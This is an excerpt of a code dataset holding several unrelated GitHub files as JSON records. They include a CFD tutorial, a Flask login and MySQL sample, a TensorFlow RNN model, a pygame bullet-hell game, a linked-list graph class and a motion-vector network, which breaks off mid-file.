:R:\n#rad = sqrt( (meshx-pi)**2 + (meshy-pi)**2 ) \nrad = sqrt( meshx**2 + meshy**2 ) \n:phi: = rad - pi/4.0\n:rho: = 1.0 + 3d()\n:p: = 1.0 + 3d() #exp( -(meshx-1.5)**2/.25**2)*.1\n:u: = where( :phi:>0.5, mach * sqrt( :p: / :rho: * :gamma:) , 0.0 )\n#:u: = mach * sqrt( :p: / :rho: * :gamma:)\n:u: = gbar( gbar( :u: ) )\n:v: = 0.0 + 3d()\n:Et: = :p:/( :gamma: - 1.0 ) + .5*:rho:*(:u:*:u: + :v:*:v:)\n:rhou: = :rho:*:u:\n:rhov: = :rho:*:v:\n:cs: = sqrt( :p: / :rho: * :gamma: )\n:dt: = dt.courant(:u:,:v:,:w:,:cs:)\n[:gx:,:gy:,:gz:] = grad( :phi: )\n:gx: = gbar( :gx: )\n:gy: = gbar( :gy: )\n\"\"\"\nic = ic.replace('mach',str(mach))\n\n# Set the initial conditions\nss.setIC(ic)\n \n\n# Write a time loop\ntime = 0.0\nviz = True\n\n# Approx a max dt and stopping time\ntt = 3.0 #\n\n# Start time loop\ncnt = 1\nviz_freq = 100\npvar = 'umag'\n\nCFL = 1.0\ndt = ss.var('dt').data * CFL*.01\nwvars = ['p','rho','u','v','phi']\nss.write( wvars )\nwhile tt > time:\n \n # Update the EOM and get next dt\n time = ss.rk4(time,dt)\n dt = min( ss.variables['dt'].data * CFL, dt*1.1)\n dt = min(dt, (tt - time) )\n \n # Print some output\n ss.iprint(\"%s -- %s --- %f\" % (cnt,time,dt) )\n cnt += 1\n if (cnt%viz_freq == 1) :\n ss.write(wvars)\n \n\nss.writeRestart()\n \n\n","repo_name":"EduardoMolina/pyranda","sub_path":"examples/tutorials/cylinder.py","file_name":"cylinder.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"22461927708","text":"import scipy.special\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\n\ndef st_pdf(x, mu, sigma, nu):\n return scipy.special.gamma((nu + 1) / 2) / (\n sigma * np.sqrt(nu * np.pi) * scipy.special.gamma(nu / 2)) * \\\n np.power(1 + ((x - mu) / sigma) ** 2 / nu, -(nu + 1) / 2)\n\ndef uniform_pdf(x, a, b):\n return scipy.stats.uniform(loc=a,scale=b-a).pdf(x)\n\ndef vg_pdf(x, mu, sigma, kappa, theta):\n horizon = 1\n coeff_1 = np.sqrt(2) * np.exp(theta * (x - mu * horizon) / (2 * sigma ** 2)) \\\n / (sigma * np.sqrt(np.pi) * kappa ** (horizon / kappa) * scipy.special.gamma(\n horizon / kappa))\n coeff_2 = np.power(np.abs(x - mu * horizon) / np.sqrt(2 * sigma ** 2 / kappa + theta ** 2),\n horizon / kappa - 0.5)\n bessel_order = horizon / kappa - 0.5\n bessel_param = np.abs(x - mu * horizon) * np.sqrt(\n 2 * sigma ** 2 / kappa + theta ** 2) / sigma ** 2\n bessel = scipy.special.kv(bessel_order, bessel_param)\n res = coeff_1 * coeff_2 * bessel\n return res\n\n# mu = 0\n# nu = 3\n# sigma_norm = np.sqrt(5)\n# sigma = sigma_norm/np.sqrt(nu)\n\nmu = 0.0002621652698799067\nsigma = 0.009228227387922006\nnu = 2.809213663439115\nsigma_norm = np.sqrt(nu) * sigma\n\nx = np.linspace(-10, 10, 100000)\npdf = st_pdf(x, mu, sigma, nu)\n#pdf = vg_pdf(x, 0, np.sqrt(5), 0.5, 0)\n#pdf = uniform_pdf(x, -1, 1)\ndelta = x[1] - x[0]\nlast_pmf = pdf * delta\none_pmf = pdf * delta\nplt.plot(x, last_pmf / delta, label=\"PDF, n = 0\")\nfor i in range(1, 255):\n last_pmf = scipy.signal.fftconvolve(one_pmf, last_pmf, 'same')\n last_pdf = last_pmf / delta\n if i == 1 or i == 50 or i == 100 or i == 254:\n plt.plot(x/np.sqrt(i+1), last_pdf * np.sqrt(i+1), label=\"PDF, n = %s\" % (i))\nplt.plot(x, scipy.stats.norm.pdf(x, mu, sigma_norm), 'k-', label='N')\nplt.xlim([-0.2, 0.2])\nplt.ylim([1e-3, 100])\nplt.yscale('log')\nplt.legend()\nplt.show()","repo_name":"antdvid/LongTermVaR","sub_path":"TestConvergenceOfConvolution.py","file_name":"TestConvergenceOfConvolution.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"893677178","text":"from unittest import result\nfrom flask_app.config.mysqlconnection import connectToMySQL\n\n\nclass Dojo:\n def __init__(self, data):\n self.id = data[\"id\"]\n self.name = data[\"name\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO dojos (name, created_at ,updated_at) VALUES (%(name)s, NOW(),NOW());\"\n result = connectToMySQL(\"dojo_ninjas\").query_db(query, data)\n return result\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM dojos;\"\n results = connectToMySQL(\"dojo_ninjas\").query_db(query)\n result = []\n for dojo in results:\n result.append(cls(dojo))\n return result\n\n @classmethod\n def get_one(cls, data):\n query = \"SELECT * FROM dojos WHERE id = %(id)s;\"\n result = connectToMySQL(\"dojo_ninjas\").query_db(query, data)\n return cls(result[0])\n","repo_name":"ExploreAdrift/Python","sub_path":"flask_mysql/dojo_ninjas/flask_app/models/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1884027575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: rnn.py\n# Author: Qian Ge \n\nimport tensorflow as tf\n\nfrom tensorcv.models.base import BaseModel\nimport tensorcv.models.layers as L\n\nfrom ..model.layers import rnn_layer\n\n\nclass RNNClassification(BaseModel):\n def __init__(self, n_class,\n cell_type,\n hidden_size_list,\n max_grad_norm,\n rnn_construction=tf.contrib.rnn.MultiRNNCell):\n self._n_class = n_class\n self._cell_type = cell_type\n if not isinstance(hidden_size_list, list):\n hidden_size_list = [hidden_size_list]\n self._hidden_size_list = hidden_size_list\n self._max_grad_norm = max_grad_norm\n self._construction = rnn_construction\n\n self.set_is_training(True)\n self.layer = {}\n\n def create_model(self, input_dict):\n self._input_dict = input_dict\n self._create_model()\n\n def _create_model(self):\n with tf.name_scope('input'):\n inputs = self._input_dict['data']\n keep_prob = self._input_dict['keep_prob']\n\n outputs, state, out_size = rnn_layer(\n inputs,\n self._hidden_size_list,\n forget_bias=1.0,\n init_state=None,\n is_training=self.is_training,\n keep_prob=keep_prob,\n cell_type=self._cell_type,\n rnn_construction=self._construction,\n name='rnn_layer')\n\n outputs = outputs[:, -1, :]\n outputs = tf.reshape(outputs, [-1, out_size])\n logits = L.fc(outputs, self._n_class, name='softmax')\n prediction = tf.nn.softmax(logits)\n\n self.layer['logits'] = logits\n self.layer['prediction'] = prediction\n\n def _get_loss(self):\n label = self._input_dict['label']\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=self.layer['logits'], labels=label))\n return self.loss\n\n def _get_optimizer(self):\n lr = self._input_dict['lr']\n return tf.train.RMSPropOptimizer(learning_rate=lr)\n\n def get_train_op(self):\n with tf.name_scope('train_op'):\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(\n tf.gradients(self._get_loss(), tvars),\n self._max_grad_norm)\n grads = zip(grads, tvars)\n\n opt = self._get_optimizer()\n train_op = opt.apply_gradients(grads)\n return train_op\n\n def get_accuracy(self):\n label = tf.argmax(self._input_dict['label'], axis=1)\n pred = tf.argmax(self.layer['prediction'], axis=1)\n correct_pred = tf.equal(label, pred)\n return tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n","repo_name":"conan7882/construct-deep-rnn","sub_path":"lib/net/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"17009077127","text":"\"\"\"\r\nuse flaskDB;\r\nDROP TABLE IF EXISTS account;\r\ncreate table account(\r\n id varchar(32),\r\n pw varchar(64) not null,\r\n salt varchar(20) not null,\r\n name varchar(32),\r\n primary key(id)\r\n);\r\ninsert into account values(\"hosokawa\", \"b2ea30c8186d1e551d857d0d40e7e6e10e19c7dd540519478ea4e2a3d511a2dc\",\"kmrsmtCDmGKIfFRz7Fde\", \"細川\");\r\ninsert into account values(\"takahashi\", \"a52f8e280c28c90fa289b5a596398b6c36ff1aa01faf9df02f248a22a24be04f\",\"oz8ywexdbVUIX9jNE8kK\", \"高橋\");\r\ninsert into account values(\"takada\", \"2bb9d9ad9a1aac7e678b94625109ff7fa4e8de127279b96a6f8cbae56a953b68\",\"uJpZeg3iLU2DfmnO9DkG\", \"髙田\");\r\n\r\npassword:morijyobi\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template, request, redirect, session\r\nimport random\r\nimport string\r\nimport db\r\nfrom datetime import timedelta \r\n\r\n\r\napp = Flask(__name__)\r\n#Flaskクラスのインスタンスに秘密鍵(256桁のランダムな英文字列)を設定.\r\napp.secret_key = \"\".join(random.choices(string.ascii_letters, k=256))\r\n\r\n@app.route(\"/\")\r\ndef top_page():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/home\", methods=['POST'])\r\ndef home():\r\n id = request.form.get(\"id\")\r\n pw = request.form.get(\"pw\")\r\n\r\n # ログイン認証業務ロジック\r\n result = db.login(id, pw)\r\n\r\n if result != None:\r\n session[\"user\"] = True # セッションにキー:user、バリュー:Trueを格納します。\r\n session.permanent = True # セッションの有効期限有効化\r\n app.permanent_session_lifetime = timedelta(minutes=30) # 有効期限の値の設定\r\n return render_template(\"home.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/home\", methods=['GET'])\r\ndef home_get():\r\n # セッションにログイン情報があるか確認\r\n if \"user\" in session:\r\n return render_template(\"home.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route(\"/menu\")\r\ndef menu():\r\n if \"user\" in session:\r\n return render_template(\"menu.html\")\r\n else:\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n session.pop(\"user\", None) # セッションの削除\r\n return render_template(\"index.html\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"hosokawa3217/flask_login_sample","sub_path":"app_session.py","file_name":"app_session.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72778023685","text":"from sys import path\nimport pygame\nimport random\nimport os\nfrom pygame.constants import MOUSEBUTTONDOWN\n\nfrom pygame.sprite import groupcollide, spritecollideany\nfrom pygame.time import delay\n\n\n\n# 初始化\npygame.init()\npygame.mixer.init()\ntime = pygame.time.Clock()\nupdating = True\n\nf = open(os.path.join(\"Grade\", \"H_Grade.txt\"), mode='r')\nhscore = f.read()\nf.close()\n\n\n\nFPS = 60\nenemy_wait = 0\nE_Health = 1000\nplayer_heart = 3\nScore = 0\nMusic_On = True\n\n\nGAMESTEP = 0\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nWIDTH = 1000\nHEIGHT = 800\nP_WIDTH = 600\n\n\n\n\n# 定義視窗\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"東方Project\")\n\n#圖片讀取\nframe_IMG = pygame.image.load(os.path.join(\"img\", \"TESTBG.jpg\")).convert()\nEnemy_IMG = pygame.image.load(os.path.join(\"img\", \"Patchouli.png\")).convert()\nPlayer_IMG = pygame.image.load(os.path.join(\"img\", \"player.png\")).convert()\nF_Bullet_IMG = pygame.image.load(os.path.join(\"img\", \"F_Bullet.png\")).convert()\nE_Bullet_IMG = pygame.image.load(os.path.join(\"img\", \"E_Bullet.png\")).convert()\nP_Heart_IMG = pygame.image.load(os.path.join(\"img\", \"Heart.jpg\")).convert()\nP_Heart_IMG.set_colorkey(WHITE)\nE_Health_H_IMG = pygame.image.load(os.path.join(\"img\", \"life_H.png\")).convert()\nE_Health_M_IMG = pygame.image.load(os.path.join(\"img\", \"life_M.png\")).convert()\nE_Health_E_IMG = pygame.image.load(os.path.join(\"img\", \"life_E.png\")).convert()\nE_Health_H_IMG.set_colorkey(WHITE)\nE_Health_M_IMG.set_colorkey(WHITE)\nE_Health_E_IMG.set_colorkey(WHITE)\nTitle_IMG = pygame.image.load(os.path.join(\"img\", \"title.png\")).convert()\nStartButtom_IMG = pygame.image.load(os.path.join(\"img\", \"startbuttom.jpg\")).convert()\nMusicOn_IMG = pygame.image.load(os.path.join(\"img\", \"music_on.jpg\")).convert()\nMusicOFF_IMG = pygame.image.load(os.path.join(\"img\", \"music_off.jpg\")).convert()\nGoodEnd_IMG = pygame.image.load(os.path.join(\"img\", \"GE.png\")).convert()\nBadEnd_IMG = pygame.image.load(os.path.join(\"img\", \"BE.png\")).convert()\nReStartButtom_IMG = pygame.image.load(os.path.join(\"img\", \"re.jpg\")).convert()\n\n\n#音效\nMenu_Bgm = pygame.mixer.Sound(os.path.join(\"sound\", \"start_bgm.mp3\"))\nGame_Bgm = pygame.mixer.Sound(os.path.join(\"sound\", \"game_bgm.mp3\"))\n\n\n\n\nfont_name = pygame.font.match_font('arial')\n\n\ndef score_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, BLUE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\ndef BS_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, BLUE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\n\n# 角色\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n #self.image = pygame.Surface((40, 40))\n self.image = Player_IMG\n self.image.set_colorkey(WHITE)\n self.rect = self.image.get_rect()\n self.radius = 10\n self.rect.centerx = P_WIDTH/2\n self.rect.bottom = HEIGHT - 70\n self.speed = 5 \n self.FireTime = 0\n\n def update(self):\n # 按鍵捕捉及移動\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_SPACE] and self.FireTime == 0:\n self.fire()\n self.FireTime = 3\n if key_pressed[pygame.K_LSHIFT]:\n self.speed = 10\n else :\n self.speed = 5\n if key_pressed[pygame.K_RIGHT]:\n self.rect.x += self.speed\n if key_pressed[pygame.K_LEFT]:\n self.rect.x -= self.speed\n if key_pressed[pygame.K_UP]:\n self.rect.y -= self.speed\n if key_pressed[pygame.K_DOWN]:\n self.rect.y += self.speed\n # 邊界移動限制\n if self.rect.right > P_WIDTH:\n self.rect.right = P_WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.top < 0:\n self.rect.top = 0\n if self.rect.bottom > HEIGHT:\n self.rect.bottom = HEIGHT\n if self.FireTime > 0:\n self.FireTime -= 1\n \n\n def fire(self):\n bullet = F_bullet(self.rect.centerx, self.rect.bottom - 60)\n all_sprite.add(bullet)\n bullets.add(bullet)\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(Enemy_IMG, (70,70))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 30\n self.rect.centerx = P_WIDTH/2\n self.rect.centery = -50\n self.speedx = 1\n self.speedy = 1\n self.time = 0\n self.fireTime = 0\n self.settingPlace = False\n self.EnemyFireMode = 1\n self.x = 0\n self.y = 0\n self.bulletSpeed = 2\n\n def update(self):\n if self.settingPlace == False:\n self.movein()\n if self.settingPlace == True:\n if self.EnemyFireMode == 1 and self.time == 0 and self.fireTime < 600:\n for i in range(9):\n self.time = 40\n if i % 9 == 0:\n self.x = self.rect.centerx - 120\n self.y = self.rect.centery - 10\n self.fire()\n elif i % 9 == 1:\n self.x = self.rect.centerx - 80\n self.y = self.rect.centery + 20\n self.fire()\n elif i % 9 == 2:\n self.x = self.rect.centerx - 40\n self.y = self.rect.centery + 40\n self.fire()\n elif i % 9 == 3:\n self.x = self.rect.centerx \n self.y = self.rect.centery + 50\n self.fire()\n elif i % 9 == 4:\n self.x = self.rect.centerx + 40\n self.y = self.rect.centery + 40\n self.fire()\n elif i % 9 == 5:\n self.x = self.rect.centerx + 80\n self.y = self.rect.centery + 20\n self.fire()\n elif i % 9 == 6:\n self.x = self.rect.centerx + 120\n self.y = self.rect.centery - 10\n self.fire()\n elif i % 9 == 7:\n self.x = self.rect.centerx - 180\n self.y = self.rect.centery - 15\n self.fire()\n elif i % 9 == 8:\n self.x = self.rect.centerx + 180\n self.y = self.rect.centery - 15\n self.fire()\n self.time = 40\n if self.EnemyFireMode == 2 and self.time == 0 and self.fireTime < 600:\n for i in range(5):\n self.time = 30\n if i % 5 == 0:\n self.x = self.rect.centerx - 120\n self.y = self.rect.centery\n self.fire()\n elif i % 5 == 1:\n self.x = self.rect.centerx - 60\n self.y = self.rect.centery + 30\n self.fire()\n elif i % 5 == 2:\n self.x = self.rect.centerx\n self.y = self.rect.centery + 50\n self.fire()\n elif i % 5 == 3:\n self.x = self.rect.centerx + 60\n self.y = self.rect.centery + 30\n self.fire()\n elif i % 5 == 4:\n self.x = self.rect.centerx + 120\n self.y = self.rect.centery\n self.fire()\n self.time = 40\n self.fireTime += 1\n if self.time > 0:\n self.time -= 1\n if self.fireTime == 600:\n self.EnemyFireMode == 0\n elif self.fireTime > 720:\n self.fireTime = 0\n self.bulletSpeed += 1\n \n \n def movein(self):\n if self.rect.centery < 50:\n self.rect.y += 1\n else:\n self.settingPlace = True\n\n\n def fire(self):\n bullet = E_bullet(self.x, self.y, self.bulletSpeed)\n all_sprite.add(bullet)\n enemy_bullets.add(bullet)\n\nclass F_bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((10,35))\n self.image = F_Bullet_IMG\n self.image.set_colorkey(WHITE)\n #self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n self.rect.centerx = x\n self.rect.bottom = y\n self.speed = -15\n\n def update(self):\n self.rect.y += self.speed\n if self.rect.bottom < 0:\n self.kill()\n\nclass E_bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, z):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((18,18))\n self.image = pygame.transform.scale(E_Bullet_IMG, (18,18))\n self.image.set_colorkey(WHITE)\n self.rect = self.image.get_rect()\n self.radius = 9\n self.rect.centerx = x\n self.rect.centery = y\n self.speedx = random.randrange(-1, 2)\n self.speedy = z\n\n def update(self):\n if Enemy().EnemyFireMode == 1:\n self.move()\n if self.rect.top > HEIGHT or self.rect.right > P_WIDTH or self.rect.left < 0:\n self.kill()\n\n def move(self):\n self.rect.centerx += self.speedx\n self.rect.centery += self.speedy\n\nclass StartButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = StartButtom_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 500\n self.rect.y = 400\n\n def update(self, Mx, My):\n if 700 >= Mx >= 500 and 480 >= My >= 400:\n self.rect.x = 490\n self.rect.y = 380\n else:\n self.rect.x = 500\n self.rect.y = 400\n\nclass MusicButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = MusicOn_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 500\n self.rect.y = 500\n\n def update(self, Mx, My):\n if 700 >= Mx >= 500 and 580 >= My >= 500:\n self.rect.x = 490\n self.rect.y = 480\n else:\n self.rect.x = 500\n self.rect.y = 500\n if Music_On == True:\n self.image = MusicOn_IMG\n elif Music_On == False:\n self.image = MusicOFF_IMG\n\nclass RestartButtom(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = ReStartButtom_IMG\n self.rect = self.image.get_rect()\n self.rect.x = 400\n self.rect.y = 600\n\n def update(self, Mx, My):\n if 600 >= Mx >= 400 and 680 >= My >= 600:\n self.rect.x = 390\n self.rect.y = 580\n else:\n self.rect.x = 400\n self.rect.y = 600\n\n# sprite 群組\nall_sprite = pygame.sprite.Group()\nplayer_sprite = pygame.sprite.Group()\nbullets = pygame.sprite.Group()\nenemy_sprite = pygame.sprite.Group()\nenemy_bullets = pygame.sprite.Group()\nbuttom_sprite = pygame.sprite.Group()\nED_sprite = pygame.sprite.Group()\n\nplayer = Player()\nall_sprite.add(player)\nplayer_sprite.add(player)\nenemy = Enemy()\nall_sprite.add(enemy)\nenemy_sprite.add(enemy)\n\nsb = StartButtom()\nbuttom_sprite.add(sb)\nmb = MusicButtom()\nbuttom_sprite.add(mb)\nrb = RestartButtom()\nED_sprite.add(rb)\n# 主迴圈\n\nwhile updating:\n time.tick(FPS)\n\n if GAMESTEP == 0:\n screen.blit(Title_IMG, (0, 0))\n if pygame.mixer.music.get_busy() == 0:\n if Music_On == True:\n Menu_Bgm.play()\n Menu_Bgm.set_volume(0.1)\n Mx, My = pygame.mouse.get_pos()\n buttom_sprite.update(Mx, My)\n if 700 >= Mx >= 500 and 480 >= My >= 400:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n Menu_Bgm.stop()\n GAMESTEP = 1\n if 700 >= Mx >= 500 and 580 >= My >= 500:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Music_On == True:\n Music_On = False\n Menu_Bgm.stop()\n else:\n Music_On = True\n buttom_sprite.draw(screen)\n elif GAMESTEP == 1: #主階段\n if pygame.mixer.music.get_busy() == 0:\n if Music_On == True:\n Game_Bgm.play()\n Game_Bgm.set_volume(0.1)\n screen.blit(frame_IMG, (0, 0))\n if player_heart == 3:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (810, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (860, 255))\n elif player_heart == 2:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (810, 255))\n elif player_heart == 1:\n screen.blit(pygame.transform.scale(P_Heart_IMG, (40, 40)), (760, 255))\n elif player_heart == 0:\n Game_Bgm.stop()\n GAMESTEP = 2\n\n all_sprite.update()\n hit = pygame.sprite.groupcollide(enemy_sprite, bullets, False, True, pygame.sprite.collide_circle)\n if hit:\n E_Health -= 1\n Score += 10\n getfire = pygame.sprite.spritecollide(player, enemy_bullets, True, pygame.sprite.collide_circle)\n if getfire :\n player_heart -= 1\n \n if E_Health == 0:\n Game_Bgm.stop()\n GAMESTEP = 2\n all_sprite.draw(screen)\n score_text(screen, str(Score), 36, 840, 114)\n if Score > int(hscore):\n BS_text(screen, str(Score), 36, 900, 74)\n else:\n BS_text(screen, str(hscore), 36, 900, 74)\n\n\n elif GAMESTEP == 2: #勝利\n if Score > int(hscore):\n f.write(Score)\n f.close()\n screen.blit(GoodEnd_IMG,(0,0))\n win = True\n GAMESTEP = 3\n else:\n screen.blit(BadEnd_IMG,(0,0))\n win = False\n GAMESTEP = 3\n \n elif GAMESTEP == 3:\n if win == True:\n screen.blit(GoodEnd_IMG,(0,0))\n else:\n screen.blit(BadEnd_IMG,(0,0))\n Mx, My = pygame.mouse.get_pos()\n ED_sprite.update(Mx, My)\n if 600 >= Mx >= 400 and 680 >= My >= 600:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n GAMESTEP = 0\n ED_sprite.draw(screen)\n\n\n \n\n # 輸入\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n updating = False\n pygame.display.update()\n","repo_name":"DanDingTangYuan/Python-Game","sub_path":"projectFgame.py","file_name":"projectFgame.py","file_ext":"py","file_size_in_byte":15393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32498360718","text":"class Solution:\n \"\"\"Two pointers way\"\"\"\n def reverseString(self, s):\n l, r = 0, len(s) - 1\n\n while l <= r:\n s[l], s[r] = s[r], s[l]\n l += 1\n r -= 1\n\n print(str)\n\n # s[:] = s[::-1]\n\n\n\n\nstr = [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"]\n\nSolution().reverseString(str)","repo_name":"ForwardMoth/leetcode","sub_path":"300-399/344. Reverse String.py","file_name":"344. Reverse String.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"41264406248","text":"\"\"\"Module to represent Graph\"\"\"\n\n\nfrom LinkedList import LinkedList\n\n\nclass LinkedListGraph(LinkedList):\n \"\"\"A linked list class for a graph\"\"\"\n def __init__(self):\n super().__init__()\n\n def delete_edge_vertex(self, value):\n \"\"\"Method of removing all edges that contain\n a vertex with a specified value\"\"\"\n if self.is_empty():\n print(\"Список пуст\")\n else:\n current = self.head\n ind = 0\n\n while current is not None:\n if value in current.value:\n self.remove_node(ind)\n else:\n ind += 1\n current = current.next\n\n\nclass Graph:\n \"\"\"Class realized methods for Graph\"\"\"\n def __init__(self):\n self.vertex = LinkedListGraph()\n self.edges = LinkedListGraph()\n\n def __str__(self):\n current_vertex = self.vertex.head\n string = ''\n while current_vertex is not None:\n string += str(current_vertex.value)\n string += ' -> '\n current_vertex = current_vertex.next\n string += 'None\\n'\n\n current_edge = self.edges.head\n while current_edge is not None:\n string += str(current_edge.value)\n string += ' -> '\n current_edge = current_edge.next\n string += 'None'\n return string\n\n def edge_exists(self, vertex1, vertex2):\n \"\"\"Method for checking the existence of an edge\"\"\"\n return self.edges.is_value((vertex1, vertex2))\n\n def vertex_exists(self, value):\n \"\"\"Method for checking the existence of an vertex\"\"\"\n return self.vertex.is_value(value)\n\n def add_edge(self, vertex1, vertex2):\n \"\"\"Edge adding method\"\"\"\n if self.edges.is_empty() or not self.edge_exists(vertex1, vertex2):\n self.edges.add_last((vertex1, vertex2))\n else:\n raise ValueError(\"That edge is exists\")\n\n def add_vertex(self, value):\n \"\"\"Method for add vertex\"\"\"\n if self.vertex.is_empty() or not self.vertex_exists(value):\n self.vertex.add_last(value)\n else:\n raise ValueError(\"That vertex is exists\")\n\n def delete_vertex(self, value):\n \"\"\"Method for delete vertex\"\"\"\n if self.vertex_exists(value):\n self.edges.delete_edge_vertex(value)\n self.vertex.remove_node(value)\n else:\n raise ValueError(\"No such vertex exists\")\n\n def get_vertex(self, index):\n return self.vertex.search(index)\n\n def get_edge(self, index):\n return self.edges.search(index)\n\n\n\n\n","repo_name":"lazorikv/python-education","sub_path":"algorithms/data_structures/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31627107402","text":"import tensorflow.compat.v1 as tf\n\nfrom depth_and_motion_learning import maybe_summary\nfrom tensorflow.contrib import framework as contrib_framework\nfrom tensorflow.contrib import layers as contrib_layers\n\nlayers = contrib_layers\narg_scope = contrib_framework.arg_scope\n\n\ndef motion_vector_net(images, weight_reg, predict_intrinsics=True):\n \"\"\"Predict object-motion vectors from a stack of frames or embeddings.\n\n Args:\n images: Input tensor with shape [B, h, w, 2c], containing two\n depth-concatenated images.\n weight_reg: A float scalar, the amount of weight regularization.\n predict_intrinsics: A boolean, if True the network will predict the\n intrinsic matrix as well.\n\n Returns:\n A tuple of 3 tf.Tensors, (rotation, translation, intrinsic_mat), of shapes\n [B, 3], [B, 3] and [B, 3, 3] respectively, representing translation vectors,\n rotation angles, and predicted intrinsics matrix respectively. If\n predict_intrinsics is false, the latter is not returned.\n \"\"\"\n with tf.variable_scope('MotionVectorNet'):\n with arg_scope([layers.conv2d],\n weights_regularizer=layers.l2_regularizer(weight_reg),\n activation_fn=tf.nn.relu,\n stride=2):\n conv1 = layers.conv2d(images, 16, [7, 7], scope='Conv1')\n conv2 = layers.conv2d(conv1, 32, [5, 5], scope='Conv2')\n conv3 = layers.conv2d(conv2, 64, [3, 3], scope='Conv3')\n conv4 = layers.conv2d(conv3, 128, [3, 3], scope='Conv4')\n conv5 = layers.conv2d(conv4, 256, [3, 3], scope='Conv5')\n conv6 = layers.conv2d(conv5, 256, [3, 3], scope='Conv6')\n conv7 = layers.conv2d(conv6, 256, [3, 3], scope='Conv7')\n\n bottleneck = tf.reduce_mean(conv7, axis=[1, 2], keepdims=True)\n\n with arg_scope([layers.conv2d],\n biases_initializer=None,\n activation_fn=None,\n stride=1):\n rotation = layers.conv2d(bottleneck, 3, [1, 1], scope='Rotation')\n translation = layers.conv2d(bottleneck, 3, [1, 1], scope='Translation')\n rotation = tf.squeeze(rotation, axis=(1, 2))\n translation = tf.squeeze(translation, axis=(1, 2))\n image_height, image_width = tf.unstack(tf.shape(images)[1:3])\n rot_scale, trans_scale = create_scales(0.001)\n if predict_intrinsics:\n intrinsic_mat = add_intrinsics_head(bottleneck, image_height, image_width)\n return rotation * rot_scale, translation * trans_scale, intrinsic_mat\n # returning different number of items to unpack might cause issues.\n return rotation * rot_scale, translation * trans_scale, None\n\n\ndef add_intrinsics_head(bottleneck, image_height, image_width):\n \"\"\"Adds a head the preficts camera intrinsics.\n\n Args:\n bottleneck: A tf.Tensor of shape [B, 1, 1, C], typically the 